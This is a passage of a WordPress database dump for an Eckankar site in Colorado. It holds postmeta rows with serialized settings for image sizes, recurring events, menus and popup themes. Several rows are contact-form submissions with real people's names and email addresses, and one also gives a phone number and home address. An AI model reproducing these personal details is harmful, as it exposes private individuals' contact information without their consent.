:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:34:\"about-background-sized-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:34:\"about-background-sized-250x141.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:141;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wcstandard\";a:4:{s:4:\"file\";s:34:\"about-background-sized-550x310.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:310;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"wcbig\";a:4:{s:4:\"file\";s:34:\"about-background-sized-800x450.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:34:\"about-background-sized-320x180.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:34:\"about-background-sized-533x300.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"wcfixedheight\";a:4:{s:4:\"file\";s:34:\"about-background-sized-888x500.jpg\";s:5:\"width\";i:888;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:34:\"about-background-sized-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:34:\"about-background-sized-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcslider\";a:4:{s:4:\"file\";s:35:\"about-background-sized-1073x500.jpg\";s:5:\"width\";i:1073;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(55310,7162,'protect_children',''),(73578,254557,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:147;s:6:\"height\";i:217;s:4:\"file\";s:37:\"2020/01/art-of-spiritual-dreaming.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:37:\"art-of-spiritual-dreaming-147x150.jpg\";s:5:\"width\";i:147;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:35:\"art-of-spiritual-dreaming-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:37:\"art-of-spiritual-dreaming-122x180.jpg\";s:5:\"width\";i:122;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:37:\"art-of-spiritual-dreaming-147x150.jpg\";s:5:\"width\";i:147;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(55934,243613,'_wp_attached_file','2020/01/co-EK-BGrid-logo-title-image-4.png'),(55935,243613,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:235;s:6:\"height\";i:50;s:4:\"file\";s:42:\"2020/01/co-EK-BGrid-logo-title-image-4.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:41:\"co-EK-BGrid-logo-title-image-4-150x50.png\";s:5:\"width\";i:150;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:40:\"co-EK-BGrid-logo-title-image-4-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:41:\"co-EK-BGrid-logo-title-image-4-210x50.png\";s:5:\"width\";i:210;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(55936,243613,'_wp_attachment_image_alt','Eckankar In Colorado - Past Lives, Dreams, and Soul Travel'),(56866,114734,'protect_children',''),(92174,261536,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1105;s:6:\"height\";i:705;s:4:\"file\";s:26:\"2020/04/coeck-thanks-1.jpg\";s:5:\"sizes\";a:16:{s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"coeck-thanks-1-300x191.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:191;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:27:\"coeck-thanks-1-1024x653.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:653;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"coeck-thanks-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"coeck-thanks-1-768x490.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:490;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:26:\"coeck-thanks-1-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:24:\"coeck-thanks-1-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:26:\"coeck-thanks-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:26:\"coeck-thanks-1-250x160.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wcstandard\";a:4:{s:4:\"file\";s:26:\"coeck-thanks-1-550x351.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:351;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"wcbig\";a:4:{s:4:\"file\";s:26:\"coeck-thanks-1-800x510.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:510;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:26:\"coeck-thanks-1-282x180.jpg\";s:5:\"width\";i:282;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:26:\"coeck-thanks-1-470x300.jpg\";s:5:\"width\";i:470;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"wcfixedheight\";a:4:{s:4:\"file\";s:26:\"coeck-thanks-1-784x500.jpg\";s:5:\"width\";i:784;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:26:\"coeck-thanks-1-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:26:\"coeck-thanks-1-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcslider\";a:4:{s:4:\"file\";s:27:\"coeck-thanks-1-1100x500.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(92173,261536,'_wp_attached_file','2020/04/coeck-thanks-1.jpg'),(104032,262433,'_RTECregistrationsDisabled','1'),(104033,262433,'_RTECdeadlineType','start'),(104034,262433,'_RTECwhoCanRegister','any'),(104035,262433,'_RTEClimitRegistrations','0'),(93143,261644,'_form_id','21'),(93144,261644,'_seq_num','100'),(116272,262809,'_RTECwhoCanRegister','any'),(116273,262809,'_RTEClimitRegistrations','0'),(116274,262809,'_RTECmaxRegistrations','30'),(116275,262809,'boldgrid_hide_page_title','1'),(116276,262809,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"Third\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-17\";s:14:\"EventStartDate\";s:19:\"2020-12-20 09:00:00\";s:12:\"EventEndDate\";s:19:\"2020-12-20 10:15:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(93975,261738,'_field_224','Martina'),(94744,261866,'_wp_page_template','default'),(94745,261866,'passster_activate_protection',NULL),(94746,261866,'passster_protection_type','password'),(94747,261866,'boldgrid_hide_page_title','0'),(94748,261866,'boldgrid_in_page_containers','1'),(94749,261866,'bgseo_robots_index','index'),(94750,261866,'bgseo_robots_follow','follow'),(94751,261867,'original-file','2020/09/cosprings-area-splash-1-updraft-pre-smush-original.jpg'),(94752,261867,'smush-complete','1'),(94753,261867,'smush-info','The file was compressed from 648.10 KB to 620.76 KB saving 4.22 percent using WP-Optimize'),(94754,261867,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:663658;s:12:\"smushed-size\";i:635662;s:15:\"savings-percent\";d:4.21999999999999975131004248396493494510650634765625;}'),(104063,262435,'_VenueShowMapLink','1'),(104057,262435,'protect_children',''),(104058,262435,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1606991901;s:12:\"_VenueOrigin\";i:1606991901;s:10:\"_edit_last\";i:1606991915;s:10:\"post_title\";i:1606991915;s:11:\"post_status\";i:1606991915;s:17:\"_EventShowMapLink\";i:1606991915;s:13:\"_EventShowMap\";i:1606991915;s:17:\"_VenueShowMapLink\";i:1606991915;s:13:\"_VenueShowMap\";i:1606991915;s:13:\"_VenueAddress\";i:1606991915;s:10:\"_VenueCity\";i:1606991915;s:13:\"_VenueCountry\";i:1606991915;s:14:\"_VenueProvince\";i:1606991915;s:11:\"_VenueState\";i:1606991915;s:9:\"_VenueZip\";i:1606991915;s:11:\"_VenuePhone\";i:1606991915;s:9:\"_VenueURL\";i:1606991915;s:19:\"_VenueStateProvince\";i:1606991915;s:21:\"_VenueOverwriteCoords\";i:1606991915;s:24:\"boldgrid_hide_page_title\";i:1606991915;}'),(104059,262435,'_VenueOrigin','events-calendar'),(104060,262435,'_edit_last','2'),(104061,262435,'_EventShowMapLink','1'),(104062,262435,'_EventShowMap','1'),(143479,265134,'mec_hide_time','0'),(94724,261847,'_field_138','Hello, I used to be a member backing the 90\'s i am ready to renew my commitment.  Please contact me  at 970 424 3414. You can send me mail at 377 steele st. Craig co 81625\nThank you, may the blessings be\nLilian'),(94725,261847,'_form_id','13'),(94726,261847,'_seq_num','55'),(94720,261847,'_field_133','Lilian '),(94721,261847,'_field_134','Fernandez Barrera '),(94722,261847,'_field_135','fernandezlilian085@gmail.com'),(94723,261847,'_field_137','I want to be a member'),(24814,131315,'_EventOrigin','events-calendar'),(24815,131315,'_tribe_modified_fields','a:32:{s:12:\"_EventOrigin\";d:1566044789;s:10:\"_edit_last\";d:1566044800;s:10:\"post_title\";d:1566044800;s:11:\"post_status\";d:1566044938;s:12:\"post_content\";i:1580469300;s:16:\"tribe_events_cat\";i:1566066538;s:13:\"_thumbnail_id\";d:1566044938;s:24:\"boldgrid_hide_page_title\";d:1566044938;s:16:\"_EventRecurrence\";i:1606922230;s:17:\"_EventShowMapLink\";d:1566044938;s:13:\"_EventShowMap\";d:1566044938;s:13:\"_EventVenueID\";d:1566044938;s:15:\"_EventStartDate\";i:1582815847;s:13:\"_EventEndDate\";i:1582815847;s:18:\"_EventStartDateUTC\";i:1582815847;s:16:\"_EventEndDateUTC\";i:1582815847;s:14:\"_EventDuration\";d:1566044938;s:20:\"_EventCurrencySymbol\";d:1566044938;s:22:\"_EventCurrencyPosition\";d:1566044938;s:10:\"_EventCost\";d:1566044938;s:9:\"_EventURL\";d:1566044938;s:14:\"_EventTimezone\";d:1566044938;s:18:\"_EventTimezoneAbbr\";i:1582815847;s:16:\"protect_children\";i:1577652694;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1606922414;s:27:\"_EventNextPendingRecurrence\";i:1605277268;s:26:\"_RTECregistrationsDisabled\";i:1606922230;s:17:\"_RTECdeadlineType\";i:1606922230;s:19:\"_RTECwhoCanRegister\";i:1606922230;s:23:\"_RTEClimitRegistrations\";i:1606922230;s:21:\"_RTECmaxRegistrations\";i:1606922230;s:22:\"_EventHideFromUpcoming\";i:1606922230;}'),(24816,131315,'_edit_lock','1606947436:2'),(24817,131315,'_edit_last','2'),(64472,249746,'_wp_attached_file','2020/01/Youth-in-ECK-sized.jpg'),(59911,151053,'protect_children',''),(61789,247330,'protect_children',''),(61796,247330,'_menu_item_xfn',''),(61795,247330,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(61791,247330,'_menu_item_menu_item_parent','0'),(61797,247330,'_menu_item_url',''),(61794,247330,'_menu_item_target',''),(61790,247330,'_menu_item_type','post_type'),(61793,247330,'_menu_item_object','page'),(188230,268837,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(61792,247330,'_menu_item_object_id','7160'),(61809,247332,'protect_children',''),(61812,247332,'_menu_item_object_id','7174'),(188229,268837,'boldgrid_hide_page_title','0'),(61810,247332,'_menu_item_type','post_type'),(61811,247332,'_menu_item_menu_item_parent','0'),(61851,247336,'_menu_item_menu_item_parent','0'),(61852,247336,'_menu_item_object_id','247336'),(61849,247336,'protect_children',''),(179396,268208,'mec_hourly_schedules','a:0:{}'),(62379,31882,'protect_children',''),(179395,268208,'mec_not_in_days',''),(179394,268208,'mec_in_days',''),(179393,268208,'mec_advanced_days','a:0:{}'),(151794,266079,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:64424;s:12:\"smushed-size\";i:61628;s:15:\"savings-percent\";d:4.339999999999999857891452847979962825775146484375;}'),(118163,262872,'_RTECregistrationsDisabled','1'),(118164,262872,'_RTECdeadlineType','start'),(118165,262872,'_RTECwhoCanRegister','any'),(118166,262872,'_RTEClimitRegistrations','0'),(118167,262872,'_RTECmaxRegistrations','30'),(118168,262872,'boldgrid_hide_page_title','0'),(118169,262872,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"First\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-03\";s:14:\"EventStartDate\";s:19:\"2020-12-06 11:30:00\";s:12:\"EventEndDate\";s:19:\"2020-12-06 12:45:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(118170,262872,'_EventShowMapLink','1'),(118171,262872,'_EventShowMap','1'),(118172,262872,'_EventVenueID','262507'),(118173,262872,'_EventCurrencySymbol',''),(118174,262872,'_EventCurrencyPosition','prefix'),(118175,262872,'_EventCost',''),(118176,262872,'_EventURL',''),(118177,262872,'_EventTimezone','America/Denver'),(118178,262872,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:10:{i:262871;a:2:{s:9:\"timestamp\";i:1609673400;s:8:\"duration\";i:4500;}i:262872;a:2:{s:9:\"timestamp\";i:1612697400;s:8:\"duration\";i:4500;}i:262873;a:2:{s:9:\"timestamp\";i:1615116600;s:8:\"duration\";i:4500;}i:262874;a:2:{s:9:\"timestamp\";i:1617535800;s:8:\"duration\";i:4500;}i:262875;a:2:{s:9:\"timestamp\";i:1619955000;s:8:\"duration\";i:4500;}i:262876;a:2:{s:9:\"timestamp\";i:1622979000;s:8:\"duration\";i:4500;}i:262877;a:2:{s:9:\"timestamp\";i:1625398200;s:8:\"duration\";i:4500;}i:262878;a:2:{s:9:\"timestamp\";i:1627817400;s:8:\"duration\";i:4500;}i:262879;a:2:{s:9:\"timestamp\";i:1630841400;s:8:\"duration\";i:4500;}i:262880;a:2:{s:9:\"timestamp\";i:1633260600;s:8:\"duration\";i:4500;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(96995,262284,'_field_225','Stein'),(96996,262284,'_field_226','martina.stein.bali@icloud.com'),(96997,262284,'_field_227','CO'),(96998,262284,'_field_228','DE'),(96999,262284,'_field_229','a:1:{i:0;s:39:\"Central Colorado/ECK Temple in Colorado\";}'),(97000,262284,'_form_id','21'),(97001,262284,'_seq_num','112'),(97002,262285,'_field_224','Brigitte'),(97003,262285,'_field_225','Hahn-Carr'),(97004,262285,'_field_226','hahncarr@freenet.de'),(97005,262285,'_field_227','CO'),(97006,262285,'_field_228','DE'),(97007,262285,'_field_229','a:1:{i:0;s:39:\"Central Colorado/ECK Temple in Colorado\";}'),(97008,262285,'_form_id','21'),(97009,262285,'_seq_num','113'),(121143,263208,'protect_children',''),(128911,263459,'_EventRecurrence','a:3:{s:5:\"rules\";a:0:{}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(128874,263459,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1611754998;s:12:\"_EventOrigin\";i:1611754998;s:13:\"_thumbnail_id\";i:1611755387;s:24:\"boldgrid_hide_page_title\";i:1611754998;s:17:\"_EventShowMapLink\";i:1611754998;s:13:\"_EventShowMap\";i:1611754998;s:15:\"_EventStartDate\";i:1611755387;s:13:\"_EventEndDate\";i:1611755387;s:18:\"_EventStartDateUTC\";i:1611755387;s:16:\"_EventEndDateUTC\";i:1611755387;s:14:\"_EventDuration\";i:1611755387;s:20:\"_EventCurrencySymbol\";i:1611754998;s:22:\"_EventCurrencyPosition\";i:1611754998;s:10:\"_EventCost\";i:1611754998;s:9:\"_EventURL\";i:1611754998;s:14:\"_EventTimezone\";i:1611754998;s:18:\"_EventTimezoneAbbr\";i:1611754998;s:27:\"_EventNextPendingRecurrence\";i:1611754998;s:26:\"_RTECregistrationsDisabled\";i:1611754998;s:17:\"_RTECdeadlineType\";i:1611754998;s:19:\"_RTECwhoCanRegister\";i:1611754998;s:23:\"_RTEClimitRegistrations\";i:1611754998;s:21:\"_RTECmaxRegistrations\";i:1611754998;s:16:\"_EventRecurrence\";i:1611754998;s:18:\"_RTECnumRegistered\";i:1611754999;s:13:\"_EventVenueID\";i:1611754999;s:12:\"_dp_original\";i:1611754999;s:16:\"tribe_events_cat\";i:1611781382;s:10:\"_edit_last\";i:1611755021;s:12:\"post_content\";i:1611756114;s:10:\"post_title\";i:1611755097;s:11:\"post_status\";i:1611755387;}'),(128896,263459,'_EventStartDateUTC','2021-02-08 22:00:00'),(24819,131315,'boldgrid_hide_page_title','0'),(84593,257577,'protect_children',''),(84594,257577,'_tribe_modified_fields','a:30:{s:16:\"protect_children\";i:1580469558;s:12:\"_EventOrigin\";i:1580469558;s:10:\"_edit_last\";i:1580469622;s:10:\"post_title\";i:1580470024;s:12:\"post_content\";i:1580470024;s:11:\"post_status\";i:1580469792;s:16:\"tribe_events_cat\";i:1580494991;s:13:\"_thumbnail_id\";i:1607076112;s:24:\"boldgrid_hide_page_title\";i:1580469791;s:16:\"_EventRecurrence\";i:1607076112;s:17:\"_EventShowMapLink\";i:1580469792;s:13:\"_EventShowMap\";i:1580469792;s:13:\"_EventVenueID\";i:1580469792;s:15:\"_EventStartDate\";i:1580470024;s:13:\"_EventEndDate\";i:1580470024;s:18:\"_EventStartDateUTC\";i:1580470024;s:16:\"_EventEndDateUTC\";i:1580470024;s:14:\"_EventDuration\";i:1580469792;s:20:\"_EventCurrencySymbol\";i:1580469792;s:22:\"_EventCurrencyPosition\";i:1580469792;s:10:\"_EventCost\";i:1580469792;s:9:\"_EventURL\";i:1580469792;s:14:\"_EventTimezone\";i:1580469792;s:18:\"_EventTimezoneAbbr\";i:1580469792;s:26:\"_RTECregistrationsDisabled\";i:1607076112;s:17:\"_RTECdeadlineType\";i:1607076112;s:19:\"_RTECwhoCanRegister\";i:1607076112;s:23:\"_RTEClimitRegistrations\";i:1607076112;s:21:\"_RTECmaxRegistrations\";i:1607076112;s:22:\"_EventHideFromUpcoming\";i:1607076112;}'),(84595,257577,'_EventOrigin','events-calendar'),(84604,257577,'_edit_lock','1607101177:2'),(84605,257577,'_edit_last','2'),(24834,131315,'_EventShowMapLink','1'),(24835,131315,'_EventShowMap','1'),(24836,131315,'_EventVenueID','52069'),(24837,131315,'_EventStartDate','2020-03-14 13:00:00'),(24838,131315,'_EventEndDate','2020-03-14 14:00:00'),(24839,131315,'_EventStartDateUTC','2020-03-14 19:00:00'),(24840,131315,'_EventEndDateUTC','2020-03-14 20:00:00'),(24841,131315,'_EventDuration','3600'),(24842,131315,'_EventCurrencySymbol',''),(24843,131315,'_EventCurrencyPosition','prefix'),(24844,131315,'_EventCost',''),(24845,131315,'_EventURL',''),(24846,131315,'_EventTimezone','America/Denver'),(24847,131315,'_EventTimezoneAbbr','MDT'),(24925,132183,'popup_theme_settings','a:67:{s:24:\"overlay_background_color\";s:7:\"#ffffff\";s:26:\"overlay_background_opacity\";i:100;s:13:\"atc_promotion\";N;s:17:\"container_padding\";i:18;s:23:\"container_border_radius\";N;s:26:\"container_background_color\";s:7:\"#f9f9f9\";s:28:\"container_background_opacity\";i:100;s:22:\"container_border_style\";s:4:\"none\";s:22:\"container_border_color\";s:7:\"#000000\";s:22:\"container_border_width\";i:1;s:25:\"container_boxshadow_color\";s:7:\"#020202\";s:27:\"container_boxshadow_opacity\";i:23;s:30:\"container_boxshadow_horizontal\";i:1;s:28:\"container_boxshadow_vertical\";i:1;s:24:\"container_boxshadow_blur\";i:3;s:26:\"container_boxshadow_spread\";N;s:25:\"container_boxshadow_inset\";s:2:\"no\";s:16:\"title_font_color\";s:7:\"#000000\";s:15:\"title_font_size\";i:32;s:17:\"title_line_height\";i:36;s:17:\"title_font_family\";s:7:\"inherit\";s:17:\"title_font_weight\";i:400;s:16:\"title_font_style\";s:6:\"normal\";s:16:\"title_text_align\";s:4:\"left\";s:22:\"title_textshadow_color\";s:7:\"#020202\";s:24:\"title_textshadow_opacity\";i:23;s:27:\"title_textshadow_horizontal\";N;s:25:\"title_textshadow_vertical\";N;s:21:\"title_textshadow_blur\";N;s:18:\"content_font_color\";s:7:\"#8c8c8c\";s:19:\"content_font_family\";s:7:\"inherit\";s:19:\"content_font_weight\";i:400;s:18:\"content_font_style\";s:7:\"inherit\";s:10:\"close_text\";s:5:\"CLOSE\";s:22:\"close_position_outside\";b:0;s:14:\"close_location\";s:8:\"topright\";s:18:\"close_position_top\";N;s:21:\"close_position_bottom\";N;s:19:\"close_position_left\";N;s:20:\"close_position_right\";N;s:13:\"close_padding\";i:8;s:12:\"close_height\";N;s:11:\"close_width\";N;s:19:\"close_border_radius\";N;s:22:\"close_background_color\";s:7:\"#00b7cd\";s:24:\"close_background_opacity\";i:100;s:16:\"close_font_color\";s:7:\"#ffffff\";s:15:\"close_font_size\";i:12;s:17:\"close_line_height\";i:36;s:17:\"close_font_family\";s:7:\"inherit\";s:17:\"close_font_weight\";i:400;s:16:\"close_font_style\";s:7:\"inherit\";s:18:\"close_border_style\";s:4:\"none\";s:18:\"close_border_color\";s:7:\"#ffffff\";s:18:\"close_border_width\";i:1;s:21:\"close_boxshadow_color\";s:7:\"#020202\";s:23:\"close_boxshadow_opacity\";i:23;s:26:\"close_boxshadow_horizontal\";i:1;s:24:\"close_boxshadow_vertical\";i:1;s:20:\"close_boxshadow_blur\";i:3;s:22:\"close_boxshadow_spread\";N;s:21:\"close_boxshadow_inset\";s:2:\"no\";s:22:\"close_textshadow_color\";s:7:\"#000000\";s:24:\"close_textshadow_opacity\";i:23;s:27:\"close_textshadow_horizontal\";N;s:25:\"close_textshadow_vertical\";N;s:21:\"close_textshadow_blur\";N;}'),(24926,132184,'popup_theme_settings','a:67:{s:24:\"overlay_background_color\";s:7:\"#898989\";s:26:\"overlay_background_opacity\";s:2:\"68\";s:17:\"container_padding\";s:2:\"18\";s:26:\"container_background_color\";s:7:\"#ffffff\";s:28:\"container_background_opacity\";s:3:\"100\";s:22:\"container_border_style\";s:5:\"solid\";s:22:\"container_border_color\";s:7:\"#777777\";s:22:\"container_border_width\";s:1:\"2\";s:23:\"container_border_radius\";s:1:\"3\";s:25:\"container_boxshadow_inset\";s:2:\"no\";s:30:\"container_boxshadow_horizontal\";s:1:\"0\";s:28:\"container_boxshadow_vertical\";s:1:\"0\";s:24:\"container_boxshadow_blur\";s:2:\"30\";s:26:\"container_boxshadow_spread\";s:1:\"0\";s:25:\"container_boxshadow_color\";s:7:\"#020202\";s:27:\"container_boxshadow_opacity\";s:3:\"100\";s:16:\"title_font_color\";s:7:\"#000000\";s:17:\"title_line_height\";s:2:\"36\";s:15:\"title_font_size\";s:2:\"32\";s:17:\"title_font_family\";s:7:\"inherit\";s:17:\"title_font_weight\";s:3:\"100\";s:16:\"title_font_style\";s:0:\"\";s:16:\"title_text_align\";s:4:\"left\";s:27:\"title_textshadow_horizontal\";s:1:\"0\";s:25:\"title_textshadow_vertical\";s:1:\"0\";s:21:\"title_textshadow_blur\";s:1:\"0\";s:22:\"title_textshadow_color\";s:7:\"#020202\";s:24:\"title_textshadow_opacity\";s:2:\"23\";s:18:\"content_font_color\";s:7:\"#000000\";s:19:\"content_font_family\";s:10:\"Sans-Serif\";s:19:\"content_font_weight\";s:3:\"100\";s:18:\"content_font_style\";s:0:\"\";s:10:\"close_text\";s:0:\"\";s:14:\"close_location\";s:7:\"topleft\";s:18:\"close_position_top\";s:3:\"-13\";s:19:\"close_position_left\";s:1:\"0\";s:21:\"close_position_bottom\";s:1:\"0\";s:20:\"close_position_right\";s:3:\"-13\";s:13:\"close_padding\";s:1:\"0\";s:12:\"close_height\";s:2:\"26\";s:11:\"close_width\";s:2:\"26\";s:22:\"close_background_color\";s:7:\"#0c0c0c\";s:24:\"close_background_opacity\";s:3:\"100\";s:16:\"close_font_color\";s:7:\"#ffffff\";s:17:\"close_line_height\";s:2:\"24\";s:15:\"close_font_size\";s